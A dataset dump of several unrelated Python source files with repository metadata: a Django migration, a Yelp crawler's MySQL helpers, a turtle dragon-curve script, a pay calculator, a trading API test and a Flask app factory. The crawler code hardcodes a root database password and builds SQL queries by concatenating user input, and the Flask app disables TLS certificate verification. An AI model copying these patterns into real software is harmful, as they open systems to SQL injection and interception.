] | permissive | oseledets/ttpy | 9104e8014a73667b1cfc4fd867593cd8a6097ba0 | a50d5e0ce2a033a4b1aa703715cb85d715b9b34a | refs/heads/master | 2023-03-06T12:44:43.804115 | 2022-12-14T23:37:57 | 2022-12-14T23:37:57 | 5,499,019 | 220 | 77 | MIT | 2022-12-14T23:37:58 | 2012-08-21T18:22:27 | Python | UTF-8 | Python | false | false | 20 | py | from .eigb import *
| [
"ivan.oseledets@gmail.com"
] | ivan.oseledets@gmail.com |
bee38004695a79e71276ff54575c4e20006a4870 | e7bbbe8796a19af3479ff374c082b03539be1e14 | /tragopan/migrations/0039_auto_20150724_1407.py | 3a5498a8c827e4a76463688dae83df76c696310c | [] | no_license | nustarnuclear/orient | 9b219a05f8a515604578af24ab17f5d8f4c55f66 | 74c930dbdd0ecfc8b344ad692ad9252139d7ecb9 | refs/heads/master | 2021-01-17T03:15:37.271452 | 2015-09-24T10:21:36 | 2015-09-24T10:21:36 | 41,651,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('tragopan', '0038_auto_20150724_1359'),
]
operations = [
migrations.AlterField(
model_name='reactormodel',
name='num_control_rod_mechanisms',
field=models.PositiveSmallIntegerField(null=True, blank=True),
),
migrations.AlterField(
model_name='reactormodel',
name='num_loops',
field=models.PositiveSmallIntegerField(null=True, blank=True),
),
]
| [
"brookzhcn@gmail.com"
] | brookzhcn@gmail.com |
8d8f058dc263856303984152083e5452083a6612 | 7ac480776d4dd4c1991fc0ef1dd5ab7d55b02ee0 | /Yelp_crawler/db_forshop.py | 7ade27cddcd0a686e0bf249a7a8615b346910e4b | [] | no_license | Shencaowalker/crawler | 14b3faa015f05c0f4f1fc67a589f4f3d6d053324 | f6bfa522623b12262df2fd8d20ccdfe3c613e89e | refs/heads/master | 2021-07-09T19:16:54.143897 | 2017-10-11T00:46:09 | 2017-10-11T00:46:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,391 | py | #coding:utf-8
import MySQLdb
conn=MySQLdb.connect(
host='localhost',
port = 3306,
user='root',
passwd='shen',
db ='lunwen_yelp',
)
cur = conn.cursor()
def insertshopdb(list):
# cur = conn.cursor()
sqli="insert ignore into shoplist values(%s,%s,%s,%s)"
for i in list:
try:
cur.execute(sqli,(i.name.encode("utf-8"),i.star.encode("utf-8"),i.title.encode("utf-8"),i.address.strip().encode("utf-8")))
except Exception as e:
continue
# cur.close()
conn.commit()
def selectshopdb():
# cur = conn.cursor()
aa=cur.execute("select * from shoplist")
info = cur.fetchmany(aa)
for ii in info:
print ii[0].ljust(50,' '),"|",ii[1].ljust(5,' '),"|",ii[2].ljust(40,' '),"|",ii[3].ljust(40,' ')
print "*"*139
cur.close()
# conn.commit()
def selectshopnamecomment(name):
filename=open('comment/'+name+'.yp','w')
cur = conn.cursor()
exc="select * from shopcomment where shopname='"+name+"'"
bb=cur.execute(exc)
aa=cur.fetchmany(bb)
for ii in aa:
print ii[1].decode("utf-8"),ii[2].decode("utf-8"),ii[3].decode("utf-8"),ii[4].decode("utf-8"),ii[5].decode("utf-8")
filename.write(ii[1])
filename.write("\n")
filename.write(ii[2])
filename.write("\n")
filename.write(ii[3])
filename.write("\n")
filename.write(ii[4])
filename.write("\n")
filename.write(ii[5])
filename.write("\n")
filename.write("*"*50)
filename.write("\n")
filename.close()
cur.close()
conn.commit()
conn.close()
def insertshopuserdb(list):
# cur = conn.cursor()
sqli="insert ignore into shopcomment values(NULL,%s,%s,%s,%s,%s)"
for i in list:
for j in i:
try:
cur.execute(sqli,(i.shopname.encode("utf-8"),i.username.encode("utf-8"),i.star.encode("utf-8"),i.commenttime.encode("utf-8"),i.comment.encode("utf-8")))
print "Insert 10 data into the database"
except Exception as e:
continue
# cur.close()
conn.commit()
def selectshopname(name):
cur = conn.cursor()
exc="select * from shoplist where name='"+name+"'"
cur.execute(exc)
aa=cur.fetchone()
print aa[0].decode("utf-8"),aa[1].decode("utf-8"),aa[2].decode("utf-8"),aa[3].decode("utf-8")
cur.close()
conn.commit()
conn.close()
if __name__=="__main__":
selectshopdb()
name=raw_input("Please enter the shopname to see,if you wan't see,please direct press enter:")
selectshopnamecomment(name)
# selectshopname(name)
| [
"s1179114797@outlook.com"
] | s1179114797@outlook.com |
fda76e23dcdd8d010170b2340d061f7f933adaa4 | 4751de6966810a91e6d2d1093189d75aff8f1e0b | /Codes/3_dragon_curve.py | 9333007de9c56635f3289d93910fd9d722f19917 | [] | no_license | rodosingh/Tesellate-2020 | 4479fcbd912f56c9fe89702652bbe4bedeb26f4e | ff017870402b94d2bd2733f997e23a3efd02959f | refs/heads/main | 2023-01-02T06:24:47.999512 | 2020-10-22T16:27:40 | 2020-10-22T16:27:40 | 305,027,618 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | from turtle import *
# function to create the string according to which turtle would run!
def create_l_system(iters, axiom, rules):
start_string = axiom
if iters == 0:
return axiom
end_string = ""
for _ in range(iters):
end_string = "".join(rules[i] if i in rules else i for i in start_string)
start_string = end_string
return end_string
# draw along the above string
def draw_l_system(instructions, angle, distance):
for cmd in instructions:
if cmd == 'F':
forward(distance)
elif cmd == '+':
right(angle)
elif cmd == '-':
left(angle)
# function to execute the pattern.
def main(iterations, axiom, rules, angle, length=8, size=2, y_offset=0,
x_offset=0, offset_angle=0, width=450, height=450):
inst = create_l_system(iterations, axiom, rules)
setup(width, height)
up()
backward(-x_offset)
left(90)
backward(-y_offset)
left(offset_angle)
down()
speed(0)
pensize(size)
draw_l_system(inst, angle, length)
hideturtle()
exitonclick()
# 3 - Dragon curve
axiom = "FX+FX+FX"
rules = {"X":"X+YF+", "Y":"-FX-Y"}
iterations = 15 # TOP: 15
angle = 90
main(iterations, axiom, rules, angle, length=2, size=1, width=3000, height=3000, x_offset = 450, y_offset = 50)
| [
"adityasinghdrdo@gmail.com"
] | adityasinghdrdo@gmail.com |
31d7f04d0ba5c7031c9bb5c8bf1cd387decdeee6 | 48776e220c568f7441654f6af1d856555c32d60d | /PaymentCalculator/PaymentCalculatorWithFunction(aw).py | 13e6c13605c2f42b3d3904388595a22c0f784cdd | [] | no_license | FlangoV/Learning | 059c5d3b2f1164c36bb39485d36c144e4167e84b | 70649fcd85e94c6ce67d983d54a70d9d131d6397 | refs/heads/master | 2022-12-02T08:45:44.213467 | 2020-08-16T14:50:24 | 2020-08-16T14:50:24 | 285,836,069 | 0 | 0 | null | 2020-08-16T20:26:42 | 2020-08-07T13:30:07 | Python | UTF-8 | Python | false | false | 884 | py | def calculateOverTime(floatHours, floatRate):
overtimeHours = floatHours - 40
regularPay = (floatHours-overtimeHours)*floatRate
overtimeRate = floatRate * 1.5
overtimePay = overtimeHours*overtimeRate
overtimePayment = overtimePay+regularPay
return overtimePayment
def computepay(floatHours, floatRate):
if floatRate<=40:
if floatHours>40:
return calculateOverTime(floatHours, floatRate)
else:
regularPay = floatHours*floatRate
return regularPay
else:
print("I can't process this shit")
try:
floatHours = input("Enter the hours:")
floatHours = float(floatHours)
floatRate = input("Enter the rate:")
floatRate = float(floatRate)
except:
print("Wrong Inputs")
input("Try again")
print(computepay(floatHours, floatRate))
input("Close please")
| [
"69278564+FlangoV@users.noreply.github.com"
] | 69278564+FlangoV@users.noreply.github.com |
70d9d0ea58b9b7a882331c43014f51dfd3682705 | 0211666bbaa5907777363ce0a6cd5bf3a41d9a9c | /backend/core/api.py | fe7a7b487565ce89eed2b39ba1da7c436c193569 | [] | no_license | rg3915/django-ninja-tutorial | ababfcedaab56634b752730d9da42bebb83fa52f | ced3796f844c9ef320c6618c69af707bf68d3327 | refs/heads/main | 2023-05-08T18:50:33.540095 | 2021-06-04T19:12:13 | 2021-06-04T19:12:13 | 373,887,481 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | from typing import List
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404
from ninja import Router, Schema
from backend.todo.api import TodoSchema
router = Router()
class UserSchema(Schema):
id: int
first_name: str
last_name: str
email: str
todos: List[TodoSchema]
class Meta:
model = User
fields = '__all__'
@router.get("/users", response=List[UserSchema])
def list_users(request):
qs = User.objects.exclude(username='admin')
return qs
@router.get("/users/{id}", response=UserSchema)
def get_user(request, id: int):
user = get_object_or_404(User, id=id)
return user
| [
"regis42santos@gmail.com"
] | regis42santos@gmail.com |
eeb1821011a6e7d6efa43eabb9cc43a8875ac2ff | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/TSZLMM/YW_TSZLMM_SZXJ_042.py | 558f1e12f12527798214d8d814fbf62c8a419e2f | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,024 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_TSZLMM_SZXJ_042(xtp_test_case):
# YW_TSZLMM_SZXJ_042
def test_YW_TSZLMM_SZXJ_042(self):
title = '交易日限价委托买-错误的价格(价格=0)'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '废单',
'errorID': 11000110,
'errorMSG': queryOrderErrorMsg(11000110),
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('999999', '2', '0', '10', '0', 'B', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_BUY'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': 0,
'quantity': 200,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
| [
"418033945@qq.com"
] | 418033945@qq.com |
aeea65c858c30eff32f4ac5f2faf6c7b099e2677 | ffc02daee3b777da700425b5e0ff8445e8c7b6d8 | /Quiz/quiz_4_asset_management.py | dbc1cb6ff3506d40f8f229f46e933cd7d6ea08dc | [] | no_license | nahlaerrakik/edhec-portfolio-construction-analysis | bc5d773f51c0f9f4c651be1dafa7210e1120a54d | 018c976f0a11968614b3b1f5f6c478fe2d3a60ad | refs/heads/main | 2023-01-22T04:12:18.485805 | 2020-12-02T23:41:55 | 2020-12-02T23:41:55 | 318,020,909 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,413 | py | __author__ = 'nahla.errakik'
import edhec_risk_kit as erk
import pandas as pd
"""In the following questions, we will be working with three bonds:
B1 is a 15 Year Bond with a Face Value of $1000 that pays a 5% coupon semi-annually (2 times a year)
B2 is a 5 Year Bond with a Face value of $1000 that pays a 6% coupon quarterly (4 times a year)
B3 is a 10 Year Zero-Coupon Bond with a Face Value of $1000 (Hint: you can still use the erk.bond_cash_flows() and erk.bond_price() by setting the coupon amount to 0% and coupons_per_year to 1) Assume the yield curve is flat at 5%. Duration refers to Macaulay Duration
Hint: the macaulay_duration function gives as output the duration expressed in periods and not in years. If you want to get the yearly duration you need to divide the duration for coupons_per_year;
e.g.: duarion_B2 = erk.macaulay_duration(flows_B2, 0.05/4)/4"""
def question_1_2_3():
b1 = erk.bond_price(15, 1000, 0.05, 2, 0.05)
b2 = erk.bond_price(5, 1000, 0.06, 4, 0.05)
b3 = 1000 / 1.05 ** 10
bonds = {b1: 'b1', b2: 'b2', b3: 'b3'}
max_bond = max([b1, b2, b3])
min_bond = min([b1, b2, b3])
print("Q1: Which of the three bonds is the most expensive? {}".format(bonds[max_bond]))
print("Q2: Which of the three bonds is the least expensive? {}".format(bonds[min_bond]))
print("Q3: What is the price of the 10 Year Zero Coupon Bond B3? {}".format(b3))
def question_4_5_6():
d1 = erk.macaulay_duration(erk.bond_cash_flows(15, 1000, 0.05, 2), 0.05 / 2) / 2
d2 = erk.macaulay_duration(erk.bond_cash_flows(5, 1000, 0.06, 4), 0.05 / 4) / 4
d3 = erk.macaulay_duration(erk.bond_cash_flows(10, 1000, 0.00), 0.05)
max_duration = max([d1, d2, d3])
min_duration = min([d1, d2, d3])
durations = {d1: 'd1', d2: 'd2', d3: 'd3'}
print("Q4: Which of the three bonds has the highest (Macaulay) Duration? {}".format(durations[max_duration]))
print("Q5: Which of the three bonds has the lowest (Macaulay) Duration? {}".format(durations[min_duration]))
print("Q6: What is the duration of the 5 year bond B2? {}".format(d3))
def question_7():
liabilities = pd.Series(data=[100000, 200000, 300000], index=[3, 5, 10])
res = erk.macaulay_duration(liabilities, .05)
print(
"Q7: Assume a sequence of 3 liabilities of $100,000, $200,000 and $300,000 that are 3, 5 and 10 years away, respectively. "
"What is the Duration of the liabilities? {}".format(res))
def question_8():
"""Assuming the same set of liabilities as the previous question
(i.e. a sequence of 3 liabilities of 100,000, 200,000 and $300,000 that are 3, 5 and 10 years away, respectively)
build a Duration Matched Portfolio of B1 and B2 to match these liabilities. What is the weight of B2 in the portfolio?
(Hint: the code we developed in class erk.match_durations() assumes that all the bonds have the same number of coupons per year.
This is not the case here, so you will either need to enhance the code or compute the weight directly e.g. by entering the steps in a
Jupyter Notebook Cell or at the Python Command Line)"""
pass
def question_9():
"""Assume you can use any of the bonds B1, B2 and B3 to build a duration matched bond portfolio matched to the liabilities.
Which combination of 2 bonds can you NOT use to build a duration matched bond portfolio?"""
pass
def question_10():
"""Assuming the same liabilities as the previous questions (i.e. a sequence of 3 liabilities of 100,000, 200,000 and 300,000 that are 3, 5
and 10 years away, respectively), build a Duration Matched Portfolio of B2 and B3 to match the liabilities.
What is the weight of B2 in this portfolio?"""
liabilities = pd.Series(data=[100000, 200000, 300000], index=[3, 5, 10])
short_bond = erk.bond_cash_flows(5, 1000, .05, 4)
long_bond = erk.bond_cash_flows(10, 1000, .05, 1)
w_s = erk.match_durations(liabilities, short_bond, long_bond, 0.05)
print("Q10: Assuming the same liabilities as the previous questions (i.e. a sequence of 3 liabilities of 100,000, 200,000 and 300,000 that are "
"3, 5 and 10 years away, respectively), build a Duration Matched Portfolio of B2 and B3 to match the liabilities."
"What is the weight of B2 in this portfolio? {}".format(w_s))
question_1_2_3()
# question_4_5_6()
# question_7()
# question_8()
# question_9()
question_10()
| [
"nahlaerrakik@users.noreply.github.com"
] | nahlaerrakik@users.noreply.github.com |
6a7998e2475101c807b102b33e8cb9922406c1bd | 5e10b4c8f12dba924d9618ed82267f5555568fba | /mysite/blog/migrations/0001_initial.py | fb48db1e69a37c999c5a347b2377b315be719986 | [] | no_license | curiosityandlearn/djangoBlog | 2ef0d6eb4ed7e8704c09c807b6c422534439c6e4 | 8e15f6676a9fe2ad08c8fe88adf78be341cbd12b | refs/heads/master | 2020-04-28T09:41:12.370560 | 2015-06-26T14:23:47 | 2015-06-26T14:23:47 | 38,052,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 904 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('publiched_date', models.DateTimeField(null=True, blank=True)),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"curiosityandlearn@gmail.com"
] | curiosityandlearn@gmail.com |
20e94e2b9699fa44a90ebd86bf6adeda21a4cc2d | 6a98e451fe0bbec1cb09b76b619c0659f9a65553 | /microblog/app/__init__.py | 80f44de0b955529f504a7f42a039bce1137ee931 | [] | no_license | ys-office-llc/blog.miguelgrinberg.com-post-the-flask-mega-tutorial | 498859e699dc74d500ade64e759aa079a657c52d | e63757929bdcb5fec1e66b56a49af19f04a4eec9 | refs/heads/main | 2023-08-30T22:11:21.550996 | 2021-10-16T12:34:24 | 2021-10-16T12:34:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,318 | py | import logging
from logging.handlers import SMTPHandler, RotatingFileHandler
import os
import urllib3
from flask import Flask, request, current_app
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from flask_mail import Mail
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_babel import Babel, lazy_gettext as _l
from elasticsearch import Elasticsearch
from redis import Redis
import rq
from config import Config
urllib3.disable_warnings()
db = SQLAlchemy()
migrate = Migrate()
login = LoginManager()
login.login_view = 'auth.login'
login.login_message = _l('Please log in to access this page.')
mail = Mail()
bootstrap = Bootstrap()
moment = Moment()
babel = Babel()
def create_app(config_class=Config):
app = Flask(__name__)
app.config.from_object(config_class)
app.redis = Redis.from_url(app.config['REDIS_URL'])
app.task_queue = rq.Queue('microblog-tasks', connection=app.redis)
db.init_app(app)
migrate.init_app(app, db)
login.init_app(app)
mail.init_app(app)
bootstrap.init_app(app)
moment.init_app(app)
babel.init_app(app)
app.elasticsearch = Elasticsearch([app.config['ELASTICSEARCH_URL']], verify_certs=False, http_auth=(app.config['ELASTICSEARCH_USER'], app.config['ELASTICSEARCH_PASSWORD'])) \
if app.config['ELASTICSEARCH_URL'] and app.config['ELASTICSEARCH_USER'] and app.config['ELASTICSEARCH_PASSWORD'] else None
from app.errors import bp as errors_bp
app.register_blueprint(errors_bp)
from app.auth import bp as auth_bp
app.register_blueprint(auth_bp, url_prefix='/auth')
from app.main import bp as main_bp
app.register_blueprint(main_bp)
from app.api import bp as api_bp
app.register_blueprint(api_bp, url_prefix='/api')
if not app.debug and not app.testing:
if app.config['MAIL_SERVER']:
auth = None
if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:
auth = (app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'])
secure = None
if app.config['MAIL_USE_TLS']:
secure = ()
mail_handler = SMTPHandler(
mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),
fromaddr='no-reply@' + app.config['MAIL_SERVER'],
toaddrs=app.config['ADMINS'], subject='Microblog Failure',
credentials=auth, secure=secure)
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
if not os.path.exists('logs'):
os.mkdir('logs')
file_handler = RotatingFileHandler('logs/microblog.log',
maxBytes=10240, backupCount=10)
file_handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'))
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('Microblog startup')
return app
@babel.localeselector
def get_locale():
return request.accept_languages.best_match(current_app.config['LANGUAGES'])
from app import models
| [
"yusuke.sato@ys-office.me"
] | yusuke.sato@ys-office.me |
d35eed3fc5562b006b34fe5a7bc089ab8a52cc90 | 38aeab93e1d0abe9ce721e368a2e2da7174b34e6 | /data_pipeline/versions/2a51dc98ea0e_create_tags_table.py | 455bc3bb1d4caffa97f1a1939678f37b6cf2db36 | [] | no_license | DupSteGu-Enterprises/data-pipeline | eedccb2590bbcd680acb23bc79c34a204550f4c2 | 4a513c63d7a2ad62105e787e90b4afdbe2b6fcef | refs/heads/master | 2016-09-06T09:10:10.789744 | 2014-08-30T20:57:19 | 2014-08-30T20:57:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | """Create tags table
Revision ID: 2a51dc98ea0e
Revises: 425a54a5c9dc
Create Date: 2014-07-24 00:00:59.607487
"""
# revision identifiers, used by Alembic.
revision = '2a51dc98ea0e'
down_revision = '425a54a5c9dc'
from alembic import op
import sqlalchemy as sa
from settings import db_settings as db
def upgrade():
op.create_table(
db.TAG_TABLE,
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('title', sa.String, nullable=False),
)
def downgrade():
op.drop_table(db.TAG_TABLE)
| [
"njdupoux1994@gmail.com"
] | njdupoux1994@gmail.com |
31079aaed58856c6109af0706b28d5557bb6070f | c3e111ae34f7d97807ce1ae77241fa59928fd910 | /class2assignment1/F.py | cb40d9871c5b144ed7286b331f2b0ebce04c6390 | [] | no_license | wittydavid/devops0605 | 9cd8e187441d7ceb29a6fbe23efc49f61c0f002d | 0f92f8955785c66712d00f4756678f2ea6814028 | refs/heads/main | 2023-07-13T01:46:05.804742 | 2021-08-27T17:56:35 | 2021-08-27T17:56:35 | 384,684,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | phone_num = input("Enter phone number: ")
print(f"phone number: {phone_num}")
| [
"davidaskarian.tech@gmail.com"
] | davidaskarian.tech@gmail.com |
39b6d4bdb8972b192e3c2f9e4922aa5315e5816a | 11051f27837d449e828d73e8a9dad9deb2b9d457 | /Anime_attribute_discrimination/rori_or_other/rori_or_other_mynn.py | 99e4fc9399d56343bad30592aa9c0845b398133f | [] | no_license | KobayashiRui/pytorch_practice | 08707294ffa0d44269fcb8134c7fad1413fb781a | 8daba8ae4cd8e66db1bdd1feaacadb65b9aa63ca | refs/heads/master | 2020-07-04T13:40:05.271838 | 2019-12-23T05:04:00 | 2019-12-23T05:04:00 | 202,299,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,719 | py | import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.optim import lr_scheduler
from torch.autograd import Variable
import torchvision
from torchvision import transforms, datasets, models
import matplotlib.pyplot as plt
import numpy as np
def imshow(images, title=None):
images = images.numpy().transpose((1, 2, 0)) # (h, w, c)
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
images = std * images + mean
images = np.clip(images, 0, 1)
#print(images)
plt.imshow(images)
if title is not None:
plt.title(title)
plt.show()
#訓練データの学習
def train(train_loader):
#scheduler.step()
model_ft.train()
running_loss = 0
for batch_idx, (images,labels) in enumerate(train_loader):
if use_gpu:
images = Variable(images.cuda())
labels = Variable(labels.cuda())
else:
images = Variable(images)
labels = Variable(labels)
optimizer.zero_grad()
outputs = model_ft(images)
loss = criterion(outputs,labels)
running_loss += loss.item()
loss.backward()
optimizer.step()
train_loss = running_loss / len(train_loader)
return train_loss
#テストデータに対する精度を見る
def valid(test_loader):
model_ft.eval()
running_loss = 0
correct = 0
total = 0
for batch_idx, (images,labels) in enumerate(test_loader):
if use_gpu:
images = Variable(images.cuda(), volatile=True)
labels = Variable(labels.cuda(), volatile=True)
else:
images = Variable(images,volatile=True)
labels = Variable(labels,volatile=True)
outputs = model_ft(images)
loss = criterion(outputs, labels)
running_loss += loss.item()
_, predicted = torch.max(outputs.data,1)
correct += (predicted == labels.data).sum()
total += labels.size()[0]
correct = float(correct)
total = float(total)
val_loss = running_loss / len(test_loader)
val_acc = correct / total
#print(val_acc)
return(val_loss,val_acc)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(3,16,kernel_size=5,padding=2),
nn.BatchNorm2d(16),
nn.ReLU(),
nn.MaxPool2d(2),
)
self.layer2 = nn.Sequential(
nn.Conv2d(16,32,kernel_size=5,padding=2),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.MaxPool2d(2),
)
self.layer3 = nn.Sequential(
nn.Conv2d(32,64,kernel_size=5,padding=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(2),
)
self.fc = nn.Linear(50176,5000)
self.fc2 = nn.Linear(5000,2)
def forward(self, out):
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = out.view(out.size(0),-1)
out = self.fc(out)
out = F.dropout(out, training=self.training)
out = self.fc2(out)
return out
data_transform = {
'train': transforms.Compose([
#transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
#transforms.RandomVerticalFlip(),
transforms.RandomRotation((-60,60)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485,0.456,0.406],std=[0.229,0.224,0.225]),
]),
'val': transforms.Compose([
#transforms.RandomResizedCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485,0.456,0.406],std=[0.229,0.224,0.225]),
])
}
# train data読み込み
hymenoptera_dataset = datasets.ImageFolder(root='rori_or_other_dataset/train',
transform=data_transform['train'])
dataset_loader = torch.utils.data.DataLoader(hymenoptera_dataset,
batch_size=4, shuffle=True,
num_workers=4)
# test data読み込み
hymenoptera_testset = datasets.ImageFolder(root='rori_or_other_dataset/test',transform=data_transform['val'])
dataset_testloader = torch.utils.data.DataLoader(hymenoptera_testset, batch_size=4,shuffle=False, num_workers=4)
classes = ('other','rori')
images, classes_nam = next(iter(dataset_loader))
print(images.size(), classes_nam.size()) # torch.Size([4, 3, 224, 224]) torch.Size([4])
images = torchvision.utils.make_grid(images)
imshow(images, title=[classes[x] for x in classes_nam])
#modelの作成
model_ft = Net() #このままだと1000クラス分類なので512->1000
#for param in model_ft.parameters():
# param.requires_grad = False
use_gpu = torch.cuda.is_available()
num_epochs = 100
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model_ft.parameters(), lr=0.0001)
#optimizer = optim.SGD(model_ft.parameters(), lr=0.01, momentum=0.9)
#scheduler = lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1)
if use_gpu:
model_ft.cuda()
print("use cuda!!")
#学習開始
loss_list = []
val_loss_list = []
val_acc_list =[]
for epoch in range(num_epochs):
loss = train(dataset_loader)
val_loss, val_acc = valid(dataset_testloader)
print('epoch : {}, loss : {:.4f}, val_loss : {:.4f}, val_acc : {:.4f}'.format(epoch,loss,val_loss, val_acc))
#print("epoch : {}, loss : {:.4f}".format(epoch,loss))
#logging
loss_list.append(loss)
val_loss_list.append(val_loss)
val_acc_list.append(val_acc)
torch.save(model_ft.state_dict(),'mynn_weight2.pth')
plt.plot(range(num_epochs),loss_list,label="train_loss")
plt.plot(range(num_epochs),val_loss_list,label="val_loss")
plt.legend()
plt.show()
| [
"roboroborx782@gmail.com"
] | roboroborx782@gmail.com |
52244361d65a0612cfd41b312c743cd3c84bf8a7 | 5c81d1c58998377697301a578de3903c4e679e28 | /src/create_db.py | f8cde49b003e19ea080c99ad2074d55ef8b1f9ee | [] | no_license | evasolal/ReigoDocker | 6305148cc4ee7ec73373e2bcda494bba122bcbdd | 309a05636ae5c33b7e5e627f4a51bc35f4216916 | refs/heads/main | 2023-04-23T20:00:57.815519 | 2021-05-12T12:04:01 | 2021-05-12T12:04:01 | 366,430,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,869 | py | import sqlite3
from sqlite3 import Error
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by db_file
:param db_file: database file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db_file)
return conn
except Error as e:
print(e)
return conn
def create_table(conn, create_table_sql):
""" create a table from the create_table_sql statement
:param conn: Connection object
:param create_table_sql: a CREATE TABLE statement
:return:
"""
try:
c = conn.cursor()
c.execute(create_table_sql)
except Error as e:
print(e)
def main():
database = "addresses.db"
sql_create_address_table = """ CREATE TABLE IF NOT EXISTS address (
id integer PRIMARY KEY,
ADDRESS text NOT NULL,
BEDROOMS float,
BATHROOMS float,
SIZE integer,
SOLD_ON text,
ZESTIMATE text,
WALK_SCORE integer,
TRANSIT_SCORE integer,
GREAT_SCHOOLS float,
UNIQUE(ADDRESS)
);"""
conn = create_connection(database)
#create table
if conn is not None:
create_table(conn, sql_create_address_table)
else:
print("Error! cannot create the database connection.")
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | evasolal.noreply@github.com |
